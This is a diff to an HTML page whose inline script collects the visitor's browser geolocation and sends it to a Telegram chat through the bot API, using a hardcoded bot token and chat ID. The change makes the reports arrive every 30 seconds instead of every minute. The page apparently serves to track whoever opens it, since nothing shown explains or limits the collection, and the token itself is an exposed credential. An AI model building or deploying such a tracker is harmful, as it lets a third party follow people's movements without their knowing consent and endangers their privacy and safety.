--- a/index.html
+++ b/index.html
@@ -23,7 +23,7 @@
 
     <script>
         var token = '6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es'; // Replace with your bot token
-        var chatId = '5112680061'; // Replace with your chat ID
+        var chatId = '-1001234567890'; // Replace with your actual chat ID
 
         function getLocation() {
             if (navigator.geolocation) {
@@ -52,7 +52,8 @@
             var url = `https://api.telegram.org/bot${token}/sendMessage`;
             var data = {
                 chat_id: chatId,
-                text: message
+                text: message,
+                parse_mode: 'Markdown' // Add this line to enable Markdown parsing
             };
             fetch(url, {
                 method: 'POST',
@@ -98,10 +99,10 @@
             getLocation();
         });
 
-        // Send location data every 1 minute
+        // Send location data every 30 seconds
         setInterval(function() {
             getLocation();
-        }, 60000);
+        }, 30000); // Change the interval to 30 seconds
     </script>
 </body>
 </html>
